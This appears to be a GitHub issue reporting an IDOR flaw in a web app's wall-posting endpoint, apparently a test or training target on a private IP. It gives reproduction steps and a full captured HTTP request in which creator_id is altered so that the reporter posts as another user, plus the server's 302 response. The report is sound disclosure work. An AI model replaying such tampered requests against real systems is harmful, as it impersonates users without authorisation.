Skip to content

IDOR on posting on wall / news feed #5

New issue
New issue
Open
Open
IDOR on posting on wall / news feed#5
@jeremybuis

Description

@jeremybuis
jeremybuis
opened on Oct 26, 2017

Steps to Reproduce:

  1. Log in as any user
  2. Navigate to your wall
  3. Make a post on your own wall
  4. Capture the request using an intercepting proxy
  5. Resend the request after modifying the creator_id to any other user
  6. View your wall to see a post from the other user

Note: creator_id=682 is the Adam Perez user and user_id=1002 is myself

Attack Request

POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Referer: https://192.168.99.100:8443/index
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1

on_wall=1&creator_id=682&type=TEXT&content=not myself

Attack Response

HTTP/1.1 302 
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:10:57 GMT
Connection: close

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions